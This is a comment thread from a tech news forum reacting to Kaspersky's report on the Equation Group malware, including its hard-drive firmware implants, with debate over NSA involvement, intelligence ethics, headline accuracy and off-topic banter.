How "Omnipotent" Hackers Tied To NSA Hid For 14 Years and Were Found At Last

Advocatus Diaboli writes The money and time required to develop the Equation Group malware, the technological breakthroughs the operation accomplished, and the interdictions performed against targets leave little doubt that the operation was sponsored by a nation-state with nearly unlimited resources to dedicate to the project. The countries that were and weren't targeted, the ties to Stuxnet and Flame, and the Grok artifact found inside the Equation Group keylogger strongly support the theory the NSA or a related US agency is the responsible party, but so far Kaspersky has declined to name a culprit. NSA officials didn't respond to an e-mail seeking comment for this story. What is safe to say is that the unearthing of the Equation Group is a seminal finding in the fields of computer and national security, as important, or possibly more so, than the revelations about Stuxnet.

Us vs them

[halivar]

We hack Iran to prevent them from releasing a bomb.

NK hacks us to prevent us from also releasing a bomb, IYKWIMAITYD.

Re:Us vs them

The Interview is the funnies movie I've ever seen.

Re:Us vs them

Is it also the first movie you've ever seen ?

Re:Us vs them

[halivar]

No, he's also seen Gigli, Ishtar, and Domino.

Re:Us vs them

[MightyMartian]

Let's face it. If you're a Michael Bay fan, The Interview probably would come off as high art.

Re:Us vs them

Are you always this pompous?

Re:Us vs them

[MightyMartian]

I didn't mean to upset the Michael Bay fans. I know how they all think Pearl Harbor is the highest achievement in cinema history, apart from Transformers: Revenge of the Fallen.

Re:Us vs them

Let's face it. If you're a Michael Bay fan, The Interview probably would come off as high art.

Michael Bay doesn't do comedies.

At least not intentionally.

The typical Michael Bay fan looks for explosions, car chases, and hot chicks in tight clothes. I really doubt that The Interview had enough of any of those to appeal to them.

Re:Us vs them

[CauseBy]

I watched it. I thought it was above average for a gross slapstick comedy.

Re:Us vs them

By "pompous," do you mean "I like Michael Bay movies and if this guy's not pompous then I am kinda stupid, therefore he's pompous"?

Re:Us vs them

[bytesex]

And Highlander 2.

/ No! No! There *is* no Highlander 2!

Re:Us vs them

[sbrown123]

The Interview is the funnies movie I've ever seen.

I'm so sorry for you.

Re:Us vs them

[RavenLrD20k]

Dude! How did you get away with leaving a blank post?

Re: Us vs them

They all hack the banks to pay for it.

Re:Not surprising to anyone

True dat. They hate us for our freedom, not because we're using drones to blow up their elementary schools.

Re:Not surprising to anyone

[ganjadude]

they hate us cause they aint us

Re:Not surprising to anyone

[mujadaddy]

They anus?

Cover locations.

[Kaenneth]

There is a building near Microsoft labeled "Affiliated Associations of America" which sounds shady as fuck.

Re:Cover locations.

There is a building near Microsoft labeled "Affiliated Associations of America" which sounds shady as fuck.

Yeah, they do employee health benefits which means, honestly they make NSA look like the young pioneers.

Re:Cover locations.

[irrational_design]

Wow, I found an Affiliated Associations of America. If the following isn't the biggest piece of business jargon that doesn't say anything, I don't know what is.

Welcome to the AAOA benefits website. Through a cooperative platform, we developed a benefit program to enhance the value of membership for your Membership Organization or Association. AAOA provides a turnkey member benefit solution that offers companies and their employees an opportunity to reduce the costs of doing business. Take advantage of our group purchasing power and receive full access to exclusive member discounts and pricing. Look around the site and let us know if you have any questions or would like to discuss membership. With AAOA, membership doesn't cost, it pays!

Re:Cover locations.

And if you work with SQL, you can work in that building!

http://www.glassdoor.com/Job/Affiliated-Associations-of-America-Kirkland-Jobs-EI_IE478643.0,34_IL.35,43_IC1150472.htm

Apply now!

Re:Cover locations.

And Microsoft isn't?

Re:Cover locations.

It's just super meta. It sounds like they're a group that helps people start associations, and then connects them to each other, associating their associations and maybe letting them group-purchase tools to manage their memberships or something?

Re:Cover locations.

[St.Creed]

It's probably more a service for running associations.

Suppose you're a grocery and you would like to implement a membership card. Now you have to deal with lost cards, signups, people wanting to know how many loyality points they have, decide how many points to give for which purchase, what to give as a reward for points spent, etc. etc.

This type of company takes it all out of your hands, provides a pre-packaged membership club with set rewards, tiers, perks, whatever, and puts your brandname on top of the website, the loyalty card, and the brochures. The grocery probably pays a price per customer that's lower than when they would run it themselves, and the affiliate organisation has scale, so can run things cheaper while providing better service than a single company can do.

Re:Cover locations.

The keyword is in the name: Affiliated. It's a marketing company. Affiliate marketing is big business. How do you think they can offer their "services" without being paid by their customer associations? The same way it always works: If you're not paying, you're not the customer.

Re:Cover locations.

[ixidor]

here in Charlotte, the large collection of building in the same plaza as Microsoft is the CIA building, but with no external markings as such.

Re:Cover locations.

[Neo-Rio-101]

The syndicated accumulated affiliated aggregated associated conglomerated corporated assembly union group organization society company of the United States of America

*Pause for fanfare*

Re:Cover locations.

The accumulated affiliated aggregated associated assembly conglomerated corporated group organization society syndicated union COMPANY of the United States of America

Re:Cover locations.

[meta-monkey]

Also, the 8 story, black glass building with the barbed wire fences and security guards labeled "Flower Shop."

Re:Cover locations.

In Atlanta next door to a very large AT&T building is the unmarked offices of rhe CIA and NSA.

interesting infection rate graphic

Mainly for which countries are not listed. Hmmm.

Re:Not surprising to anyone

[halivar]

Often, I'm told.

"Found"

[TheCastro1689]

So a smart country would "target" itself since it recieved all the info anyway. This means that these findings aren't really there; just guesses.

Re:"Found"

[bluefoxlucid]

The whole thing is just hype. Enormous time and money? Deployment aside, I could DEVELOP something like this BY MYSELF. Virtual file systems? I wrote one on Fuse on a whim, to intercept disk access calls and check against policy. Exploiting a kernel driver? Same as exploiting anything else; it's a zero-day malware. Hundreds of CNC servers? Vanilla botnet--a deployment issue. Detecting iPhones and doing weird shit? Yeah, I work in DevOps; I have a server that detects mobile phones and redirects them to a mobile site.

Software of a given size doesn't require special time or money; it requires skill. Creating a full MacOSX clone with a BSD-like kernel and DPDF windowing system? That requires a ton of time and expert skill effort, because it's millions of lines of complex code. Creating a Windows 7 clone? Same. Creating a Linux clone from scratch? Same. Creating a WinAMP clone? Much less time and effort. Creating a FileZilla clone? Similar to a WinAMP clone. Creating a computer worm? It's a few thousand lines of code; it's single-person basement work for anyone familiar with the various techniques involved.

All of these technological breakthroughs were old in 1999.

Re:"Found"

The difference between your claims and what was done is pretty significant.

Sure, everything stated in the article can be done with folks who have the programming chops pretty easily. Where it becomes difficult is doing it all Ninja style. This isn't some hacked together code. This is very polished stuff with some serious thought put into keeping it secret.

Anyone can build a soap-box racer. Only a few can make a Ferrari.

Re:"Found"

[ColdWetDog]

You are under arrest. Please keep your hands off the keyboard. Do not move quickly.

We will be at your door presently.

Sincerely,

Your Government

Re:"Found"

[rtb61]

However government agencies using inside knowledge of source code to create these attack tools and then being stupid enough to use them ie release them into the wild where organised crime can get hold of them, is not so new. It fact it is totally and utterly mind bogglingly stupid thing to do, how fucking myopically short sighted can those fuckwits be. Government need to bloody wake up to what is going on and create a huge level of separation between attack and defence elements of cyber security. In fact the defence elements of cyber security should actively seek to prosecute the morons on the offence side when they stupidly release destructive code into the wild which goes on to attack what everyone else in the country is trying to protect. Some of those idiots need some rest time behind bars, some levels of stupidity should be punished, OK, rehabilitated in correctional facilities.

Re:"Found"

[raind]

They are hiring in the desert, probably could use someone like you.

Thinking of keyloggers,

[invictusvoyd]

Stephen Hawkings computer cannot be infected by a keylogger

Re:Thinking of keyloggers,

It can , but the log would look like this :
TAB TAB TAB TAB TAB TAB TAB TAB ENTER

Re:Thinking of keyloggers,

[rrohbeck]

Running Linux and tightening up your browser should be good enough.

Re:Thinking of keyloggers,

[Qzukk]

Now I wonder if tabs work in passwords on *nix, if I set my username to be pwd and my password to be cd ../../<TAB><TAB>f<TAB> how would anyone figure that out from a keylog dump?

Re:Thinking of keyloggers,

Not downloading random files from the Internet is good enough.

Re:Thinking of keyloggers,

[rrohbeck]

There are drive-by downloads from ad networks which you'll catch with a standard setup.

Re:Thinking of keyloggers,

by looking for the word "sudo ....." then after the carriage return will be your password, a simple grep of the log will reveal all the previous times you've typed this and "pwd" will come before it quite a bit.

Maybe you could alias "sudo" but a quick search for "-i. bash, yum" with a command in front would reveal your likely alias...

It's all bogus

There's no such thing as "omnipotent" hackers, it's all a bunch of *#*$&@%$@!$#@!#{}@{}#@}#${[[

NO CARRIER

Would you like to play a game?

Interesting they talk about airgaps

Remember that hub-bub about airgap-crossing viruses about 6 months ago? That suddenly got very quiet.

How is this a good thing?

[stevedog]

I'm not sure how I see that this is a good thing. I know it's fun to hate on the intelligence community (I've done it too), especially when we feel like our own rights have been infringed, but are we really saying that we are in favor of anything which hampers the West's ability to take clandestine actions against other states? After all the complaining we do about Congress and all the bureaucracy that comes along with anything usually related to government, we are then saying that absolutely every hostile action should be subject to the same oversight that produces exactly that molasses-like barrier to actual results?

It is without question that, at times, the intelligence community must have overstepped its bounds, as any entity with that much power would on occasion. Maybe in their case that happens far more often than it should. But does that really mean they should have no real power at all?

Re:How is this a good thing?

[Kazoo+the+Clown]

So everyone should just leave their doors wide open so the cops never have to break a door down to nab a crook? Yeah, right. If the NSA can hack into our computers, the bad guys can too. The best way to improve cybersecurity is to fix all the exploitable holes they've been using. But instead of helping us to secure our systems they've left them vulnerable because they're too lazy to pound the pavement, get individual warrants and plant bugs. Having every computer system in the world remain vulnerable made their job easier, so they chose that route, which also made the bad guys efforts easier too. But hey, it's job security, eh?

Re:How is this a good thing?

How do you know they don't have a warrant? It seems like using md5 and sha1 hashes to ensure they are only targeting specific individuals smells like somebody with very specific instructions and stiff repercussions. Otherwise it would be easier to grab a pile of people and sort them out later.

Re:How is this a good thing?

[stevedog]

No, quite the opposite. At the same time, though, what would happen if every soldier's gun had a chip that required "command approval" before any member of a squad could start firing? Sure, individual soldiers kill the wrong people, and for the wrong reasons, all the time. Hopefully, though, most of the time it is for the right reasons. And regardless, to place such restrictions on them limits their ability to safely carry out their intended purpose to such a degree that it is a problem.

The idea is that, if they *do* overstep their boundaries, then that should be handled appropriately (and that is a valid point of criticism with more domestic recent events). But to claim that the intelligence community, whose job is to move about undetected, should be telling people, "you know, these floors make it easy for someone to sneak in undetected. You should replace them with these other floors, where no one would be able to sneak in at all," would be exactly the opposite of their intended job.

They are the intelligence community, not our national cybersecurity consulting firm, and they only ought to be notifying the public if the risk to national security involved in leaving the vulnerability open is greater than the risk to national security involved in losing the intelligence that could be gained from it.

Re:How is this a good thing?

[Kazoo+the+Clown]

They are the intelligence community, not our national cybersecurity consulting firm, and they only ought to be notifying the public if the risk to national security involved in leaving the vulnerability open is greater than the risk to national security involved in losing the intelligence that could be gained from it.

What you're saying is we HAVE NO national cybersecurity entity whose purpose is to protect our infrastructure from bad actors using exactly the kinds of methods and exploits we're seeing here. And given that, we have to rely on Kaspersky to do it for us. Not only is it then a good thing, it's long overdue.

Re:How is this a good thing?

[nbauman]

I think the intelligence community has done more harm than good more often than not.

I think American foreign policy has done more harm than good to America more often than not.

For example, look at the Iraq war. We destabilized that entire region of the middle east, and left it wide open for ISIS and other militant groups.

We supported the other "color" revolutions which also deposed effective dictators who were finally out of power after we supported them for so long. In every case the hippie revolutionaries were quickly brushed aside and replaced by really tough guys.

Same with Assad in Syria. When he loses control of a region, ISIS moves in. You notice that the U.S. has stopped calling for Assad to leave.

Re:How is this a good thing?

... losing the intelligence that could be gained ...

Essentially an argument that back-doors do more good than harm: 'Cold fjord', is that you?

Like a politician, you're saying your policy solves the problems we cause. What about the harm caused by a back-door? You haven't answered the basic question about back-doors: Can China use all those back-doors too? Because back-doors are good, then China gaining intelligence must be good too. By the way, your answer doesn't count, only China's.

Most intelligence is about intellectual property. That is, the stuff that causes all that industrial espionage. So China and Russia won't steal the plans for new warships, the recipe for coca-cola is far more powerful. The NSA is lucky that piece of intelligence stays on dead-tree storage.

Re:How is this a good thing?

[kylemonger]

It's a good thing because I appreciate knowing what kind of country I really live in. For most of my life I thought I lived in a country that wouldn't torture people. Later I learned that the CIA not only tortures people, they ship people to other countries so they can be tortured harder. That's one of many examples of the things they don't teach you in school that should nonetheless influence how you think and vote. I want to know the ugly truth about what's going on. It probably won't make me happy, but it might just keep me free.

Re:How is this a good thing?

[stevedog]

I wasn't arguing that everyone should be happy about this. I would imagine that, if China found out about something like this, they would be quite upset. Similarly to how upset they would be when they found a spy in their government. That doesn't mean that our intelligence community shouldn't be trying to do exactly that and, presumably, vice versa (and, I would imagine, each is both trying and succeeding).

To address your other point: I think that, if there is evidence that industrial espionage against the US has been facilitated by NSA backdoors, then the backdoors pose a greater risk than benefit to national security (assuming that the loss from such espionage is, again, greater than intelligence gained). This is all risk/benefit -- that's their job. I would be totally fine with Coke losing their formula to China if that means that they are also able to interdict intelligence that prevents a major attuU.S. (or foreign, if sufficiently significant) soil.

But, to be clear, you are right that part of this equation was the assumption that the U.S. was far superior to all other states in their ability to detect and utilize such backdoors. This has become far less true in recent years, and these policies by their risky nature do require careful constant re-evaluation. Furthermore, there is also something to be said for the inability to "revert" the changes in many of these backdoors, such as in hardware -- so if you later decide that these pose more risk to industry than benefit to national security, you're just SOL on existing backdoors. That makes it crucial that the element of longitudinal uncertainty be taken into account in the initial decisionmaking; hopefully it is, but admittedly foresight is often not government's strong suit...

Re:How is this a good thing?

[stevedog]

I think you make an argument worth making, but your argument is about the application of tools, not the tools themselves. If the military and/or intelligence communities are being told to achieve objectives (or are even internally setting objectives) that do more harm than good, then they should be redirected. Even so, just like the military shouldn't lose their guns or cops shouldn't lose the ability to arrest people if they are arresting the wrong people, the intelligence community should not lose the tools that allow them to operate.

To argue that any element of the government is operating suboptimally is often not a difficult argument to make. To say that they (any element of government) should be eliminated or neutered altogether is something else entirely, and I feel like that should be approached with great caution.

Re:How is this a good thing?

[turbidostato]

"what would happen if every soldier's gun had a chip that required "command approval" before any member of a squad could start firing? Sure, individual soldiers kill the wrong people, and for the wrong reasons, all the time. Hopefully, though, most of the time it is for the right reasons. "

What would happen if every computerized autonomous weapon system had a chip that required "command approval" before firing?

There's no such a chip on soldiers' weapons for a twofold reason:
* There's not enough man/computer power to deal with the vast amount of information process required.
* In case of a delay or misundernstandment the good guys die.

That's not the case here: the analysis power is there and nothing of value is lost in case of a minor delay. I don't want the "hopefully, though, most of the time it is for the right reasons" here: it is not only a too low ethical ground but it's not needed either.

Re:How is this a good thing?

[DNS-and-BIND]

Confirmation bias. When intelligence succeeds, you never hear about it. ULTRA, probably the most successful intelligence operation ever, was kept secret for decades. Nobody knew what it was or how it had helped.

You need to watch it talking about the color revolutions that way. Sounds like dog whistle racism to me. Just because Obama did it doesn't mean it was wrong. Nobody could have predicted this outcome.

Re:How is this a good thing?

[nbauman]

The term "color revolution" has nothing to do with race. It refers to movements like the Orange Revolution in the Ukraine, the Rose Revolution in Georgia, the Purple Revolution in Iraq, the Cedar Revolution in Lebanon (not a color but it fits in the category), and the other revolutions of the Arab Spring.

What they have in common is that most of them, like the Orange Revolution, got money, strategic advice, and other support from the U.S., through the International Republican Institute and the National Democratic Institute. The U.S. gave support to the parties that they favored in elections, in ways that would be illegal if foreigners did it in U.S. elections. And the idealistic revolutionaries were swept away by armed gangs.

ULTRA ran during WWII. The issues and ethics of that war were relatively clear, and it was reasonable for people to put aside any reservations about the uncomfortable things the British, Americans and Soviets did and work together on the common goal.

Nowadays, we don't have any great common goals and the wars and undercover activities are usually promoted by war hawks with their own agendas, usually without the kind of consensus and approval I think is necessary in a democracy. Why did the U.S. overthrow Aristide? Why did we invade Iraq?

During a war like WWII, that threatens our existence, we have to put up with secrecy and limits to our freedom and democracy. We don't have a war like WWII, so those compromises aren't justified. The only wars we have are the ones that the intelligence services themselves created. So now, these politically neutral technical innovations are doing more harm than good.

Re:How is this a good thing?

But does that really mean they should have no real power at all?
If you can't control your actions and can't obey the laws you are suppose to be protecting then NO!!!

Re:How is this a good thing?

Schneier has an insightful blog post on this question; in part: "Today's top-secret programs become tomorrow's PhD theses and the next day's hacker tools." Today, the Equation Group is "probably the most sophisticated computer attack group in the world," but these techniques aren't magically exclusive to the NSA. "
Kaspersky published details at https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf

The headlne and the text say different things

[Geoffrey.landis]

The headlne says different things than the text and the original article.

The headline says that they "were found"... but they weren't.

The headline that they are "tied to NSA"... but TFA says that "researchers stopped short of saying Equation Group was the handiwork of the NSA."

Re:The headlne and the text say different things

Welcome to headlines 101, using whatever works to make you click and then hoping you'll stick around a little.

Re:The headlne and the text say different things

[grcumb]

The headline that they are "tied to NSA"... but TFA says that "researchers stopped short of saying Equation Group was the handiwork of the NSA."

In fairness, by 'stopped short' they mean that the Kaspersky guys essentially said, 'We're not saying it's the NSA - we just can't imagine anyone else on the face of the earth who has the resources necessary to do this kind of thing.' So yes, the report was released with a nod in the direction of the NSA.

Re:The headlne and the text say different things

[blueg3]

The headline that they are "tied to NSA"... but TFA says that "researchers stopped short of saying Equation Group was the handiwork of the NSA."

That's a clever turn of phrase. Kaspersky pointedly calls them out as NSA, but doesn't explicitly say "this is a group at NSA".

Re:The headlne and the text say different things

[geekmux]

The headlne says different things than the text and the original article.

The headline says that they "were found"... but they weren't.

The headline that they are "tied to NSA"... but TFA says that "researchers stopped short of saying Equation Group was the handiwork of the NSA."

Tell me something, when you find a hack of this magnitude, how quickly are you going to be willing to jump up and down screaming "they did it! they did it!"?

"stopped short" is politically correct speak for we-know-who-not-to-fuck-with.

Oh, by the way

I'm just going to mention that all these hacks are aimed at Windows machines. When you have a monoculture, you get the Irish potato famine.

Re:Oh, by the way

RTFA. They point out that they don't have an example of actual Mac infections (they only have two for Windows over the last 15 years), but that they get regular communication from infected machines identifying as Mac OS. Kaspersky makes it clear that they believe Macs are also compromised as a result. Nothing is mentioned about Linux, but I'd be surprised if they don't have access there as well.

Re:Oh, by the way

If they can find ways to run malware solely through windows registry, and actually rewrite hard drive firmware, I'm sure they have ways to exploit Linux boxes.

Let's be honest, with the amount of funding they have I'd be shocked if they couldn't.

The NSA hides surveillance software in hard drives

[Advocatus+Diaboli]

Ya.. another related post from engadget (http://www.engadget.com/2015/02/16/hard-drive-spyware/). "It's been known for a while that the NSA will intercept and bug equipment to spy on its soon-to-be owners, but the intellgency agency's techniques are apparently more clever than first thought. Security researchers at Kaspersky Lab have discovered apparently state-created spyware buried in the firmware of hard drives from big names like Seagate, Toshiba and Western Digital. When present, the code lets snoops collect data and map networks that would otherwise be inaccessible -- all they need to retrieve info is for an unwitting user to insert infected storage (such as a CD or USB drive) into an internet-connected PC. The malware also isn't sitting in regular storage, so you can't easily get rid of it or even detect it."

Re:He might be referring to this

[Johnny+Loves+Linux]

This is the video that might explain the attitude: it's Spielberg vs. Hitchcock in an epic rap battle: https://www.youtube.com/watch?... Whatever your opinion of the directors, you might find the video hilarious!

IYKWIMAITYD

I had never seen this acronym before but when I seen it I automatically read it as If You Know What I Mean And I Think You Do. I am shutting down my computer now and taking a break from this internet thing.

Re:IYKWIMAITYD

[Anubis+IV]

Never seen it before either, and that's exactly how I read it too. Scary that he was right about knowing what you meant.

Is the US gov't

[jodido]

going to cut the US off from the Internet for a day (like they did to N. Korea) as punishment for all this?

Re:Is the US gov't

[Tablizer]

going to cut the US off from the Internet for a day (like they did to N. Korea) as punishment for all this [revelation]?

Yes, they'll make us all use Comcast. Explains the merger.

I can haz party?

Now that these "Omnipotent" hackers have been caught will there be a pool party on the roof?

How is this a good thing?

Its like an arms race - the US was obviously winning for a while- but the the Chinese, Russians, North Koreans realized they were being hacked and therefor had to build a suitable counter competency, which also included the ability to hack US agencies - I think what we are seeing now is more of a is more emphasis from other nations being put on cyber "terrorism" (was the US terrorizing these nations?), and ultimately more global balance.

cyber bogeymen

kaspersky is havening a field day with carefully pointing but not naming them. How many press releases and we still don't have all the info?

Thank you

[ArchieBunker]

Read the headline which sounded interesting but the summary sounded like a completely different story.

Re:The NSA hides surveillance software in hard dri

What's scary is they aren't just hiding in the hard drives. They are actually rewriting the firmware of those drives, and carving out invisible partitions that that can't get formatted.

Kapersky again....

[chasm22]

Just the other day they 'broke' the story about the big bank heist---and declined to identify the banks.

Now they have broke the story about the mother of all hacker groups. And guess what. They decline to identify them. We found 'em. But we're not telling you who.

Is this part in the linked article hilarious? "Using a C&C center, The Equation group comprises of over 300 domains and more than 100 servers hosted in countries including the US, UK, Panama and Colombia. Panama and Colombia? Yeah, hotbeds of foreign intrigue. Ha, ha. I think if I had found the servers set up in Panama and Colombia, it wouldn't be the NSA I'd be looking at. Let's see, what are there leading exports again? No, instead I think Kapersky is pulling some of this crap out of the proverbial crap hole. Sorry though. I can't specifically say it's Kapersky. But hey, everything seems to be pointing in one direction/or another, right?

Oh, and then there is this. "Disclaimer: Kaspersky Labs sponsored the trip to the Security Analyst Summit 2015."

I used to like Kapersky. But with names like GReAT(Global Research and Analysis Team) and research like this, I'm having serious doubts about where the PR ends and reality sets in. I guess if you want to believe what they're trying to sell, Kapersky is the greatest ever.

Re:Kapersky again....

Good save, Agent Dooley. I think they bought it.

Revised- headlne and the text say different things

[Geoffrey.landis]

Actually, I should modify my comment. The headline does say a different thing from the summary, but the actual article does in fact go on to give some reasonable evidence that connecting the group to the NSA. So, "tied to NSA" is an accurate summary, although with the caveat "tied to" is words that "stop short" of saying that it actually is the NSA.

Get that right, its Omnipotent, not Omni-Potent.

Remember your groups. There is only one Omni-Potent.
ph3@r m3

Get that right, its Omnipotent, not Omni-Potent.

I'm Not Anonymous. those fricking wankers.

Infected machines reporting to Equation Group?

[lippydude]

"infected machines reporting to Equation Group command servers identified themselves as Macs, an indication that the group successfully compromised both iOS and OS X devices."

What vectors did the malware exploit to load-and-excute on the targeted Windows, iOS and OS X devices? Please provide samples of the disassembled code.

Unregistered

[eric31415927]

Running MD5sum on Unregistered (with no carriage return) produces the hash 84b8026b3f5e6dcfb29e82e0b0b0f386

The article used a lower-case u in unregistered, which produces a different hash.

Still no luck on figuring out e6d290a03b70cfa5d4451da444bdea39
My email address doesn't hash to it, so I guess I'm not being singled out.

Re:Unregistered

Arabic for unregistered, the article was updated.

Re:Human Nature

[causality]

is such that certain crimes are so grave that they transcend the realm of due process and require summary execution.

The whole point of due process is to ensure that yes, this is indeed the guilty party to be punished. Historically, the witch hunt was one popular alternative.

Re:The NSA hides surveillance software in hard dri

Why does that mean that it's NSA?

Given that most of the electronic manufacturing is in China or Taiwan, it's fairly reasonable to think that hardware bugging could be a result of Chinese intelligence operations. If you were them, where would you concentrate efforts---where you have a comparative advantage. NSA can make use of the best spy satellites and submarine fiber operations, China would exploit manufacturing in their country of foreign goods.

Of course there are powerful state-sponsored espionage efforts. But too many people think that's only NSA, when the list of suspects should include all big ones, i.e. China, Russia, UK, Germany, France & Israel.

What a load of crap.

[hackus]

I highly doubt they had the resources to infiltrate all of these systems without key industry support.

You have to be an incredible moron to think these people are brilliant, they are not.

They have a huge checkbook and that is the only brilliance they need to get the cooperation they require from Seagate, Toshiba etc.

They do not need the entire company to conspire, only a handful will do, from the article I would say less than 10.

It is almost as stupid as believing Google protects your privacy because they use HTTPS on search queries.

Brilliant my ass

Bye Bye Kaspersky

Kaspersky is going down, and that's a very good thing for America!

The application of force

[Etherwalk]

I think the intelligence community has done more harm than good more often than not.

I think American foreign policy has done more harm than good to America more often than not.

Throughout history, it has been the use of power which has undermined empires, and the threat of the use of power which makes them most effective. Wars are costly and can be unpredictable; they have almost always much more expensive than planned and almost always much less useful, except at certain very defined tasks. (Giving someone a temporary boost to poll numbers, uniting a country against a perceived threat, acting as a salve to respond to demand for war that leaders are afraid to turn down).

There are also other risks inherent in war. You train a large number of soldiers and give them weapons and training, which means that every day, your nation is fundamentally dependent upon their loyalty to survive--sometimes to defend it, but ALWAYS to not change the government or take over the government or turn on the country.

Re:The application of force

[nbauman]

What our intelligence services are doing is overthrowing brutal, efficient dictators who kept their country together and replacing them with brutal, inefficient armed gangs who are tearing their country apart.

Saddam Hussain had one of the best education systems, and one of the best health care systems, in the mideast. They had a higher ratio of female college professors than we do in the US.

Need more meat and potatoes

I would have expected Slashdot to have much better commentary regarding this. Hopefully this thread just needs time to ripen.

Accusations Akimbo - But No Remedies?

Love how there's plenty of how it was done, but no real discussion on how to avoid it, detect it, or anything relevant to the millions of users that are wide fucking open to nation-state tampering.

And you call yourselves geeks.

I guess we all roll over and say "meh, guess I'll just recompile my kernel while the world burns".

Re:Accusations Akimbo - But No Remedies?

[Ash-Fox]

Why would we need to discuss it when we already know how?

I guess we all roll over and say "meh, guess I'll just recompile my kernel while the world burns".

Precisely. If you look at all those attacks, they are targeting Windows specifically.

Stupidity

[ThatsNotPudding]

Stupidity is defined as mere elected officials thinking they have real control of the organs of state security. It wasn't true in the Soviets, it isn't true in the US.

In Other Words: COMMUNISTS

And yeah, NSA is a bunch of communists, too.

The Only Thing

..which will work is for China and Russia to develop their indigenous Information Technology.

Everybody else please revert to paper and Daimler+Benz's innovation. Dont forget to clip the GSM txmitter they have infested cars with these days.

Or bend over.

What Works For The Goose

..is also good for the Gander.

Recently an AEGIS Radar in the black see was put out of comission by Russkie electronic attack.

You take out 1MW radar by some 10W signal from 100km distance...

Welcome to the New Insecurity !

NICE LIE

Most of the stuff made in China is being developed (both HW and SW) in the U.S. or by U.S. vasalls (like ARM, NXP, SG, Siemens or Checkpoint).

So - nice try to deflect from the JCS/NSA World Domination Complex.

Re:NICE LIE

So - nice try to deflect from the JCS/NSA World Domination Complex.

50 cent party detected.

Just Imagine What Exists Now

Just imagine what exists now, if we are allowed to learn about these particular exploits...

Could this be the guy?

https://www.linkedin.com/pub/robert-green/26/525/6a6
https://www.linkedin.com/company/professional-solutions-llc?trk=ppro_cprof

--

These Guys Are Fucking Geniuses

[darkmeridian]

You can hate the NSA all you want, but I have to tip my cap at their utter genius.

Beyond the technical similarities to the Stuxnet and Flame developers, Equation Group boasted the type of extraordinary engineering skill people have come to expect from a spy organization sponsored by the world's wealthiest nation. One of the Equation Group's malware platforms, for instance, rewrote the hard-drive firmware of infected computersâ"a never-before-seen engineering marvel that worked on 12 drive categories from manufacturers including Western Digital, Maxtor, Samsung, IBM, Micron, Toshiba, and Seagate.

The malicious firmware created a secret storage vault that survived military-grade disk wiping and reformatting, making sensitive data stolen from victims available even after reformatting the drive and reinstalling the operating system. The firmware also provided programming interfaces that other code in Equation Group's sprawling malware library could access. Once a hard drive was compromised, the infection was impossible to detect or remove.

Thank you, NSA

[mtrachtenberg]

Thank you, National Security Agency, for doing such a truly brilliant job of damaging future prospects for the American computer hardware industry. Smart move to leave the torture to the CIA, no reason for geeks to get their hands dirty. You, along with the CIA, daily provide the rest of the world with evident of how deeply, incredibly stupid supposedly smart people can be when they don't mix with grown-ups. Congratulations!

Wrong

The right question is,

How much cash, drugs, African prostitutes did Seagate and Western Digital and their "contractors" squeeze out of the USA for access to their drives while in production ?

It is no matter at all that NSA did it.

The question is MONEY (cash, drugs, prostitute slaves) to Seagate and Western Digital and their Contractor CEO's.

Kaspersky and friends

Well done Kaspersky ! Even more so if the KGB or MVD (or RGN or VMG) lent a helping hand in this whole post-hollywoodian scenario of uncovering the malfeasances of the US. Why not ? You anglo-saxons and western europeans are not so naive, I hope, to think that there isn't a CCCP-NSA ?!

They must deliver it 1st

This intercepts it before they can http://start64.com/index.php?o... & same with any known virus/spyware/trojan/malware maker, botnet herder, spammer/phisher, tracker, etc. - et al! See, the funniest part is, they HAVE to be exposed to work (only specifically targetted ones aren't) & thus, they are ALL exposed, shortly.

* That's part of what it does for security...

(Rest is more reliability vs. DNS issues, & more speed - only security solution I know of that offers it 2 ways (hardcoded locally resolved favorite sites where you spend most of your time online which also aids reliability, AND, blocking adbanners which steal your money in what you paid out monthly to be online...))

Between hosts & your firewall (both native to your OS & operating in kernelmode)? That's the best defense you already have!

Literally a forcefield or logical diode/safety valve of sorts that really works for better speed, security, reliability (& even anonymity to an extent) just by using what you already have with updating/patching OS + Apps.

You can't get sick if you're unable to be exposed (online @ least, the usual delivery mechanism), after all.

APK

P.S.=> By "yours truly": ACCEPT no substitutes (Porsche... from Risky Business, & Tom Cruise (a fellow syracusan)) - it just works - in both True 64-bit &/or 32-bit native code written with the native NT API, Win32/64 API, + highly optimized by hand & compiler Borland Delphi XE4 Object Pascal code... apk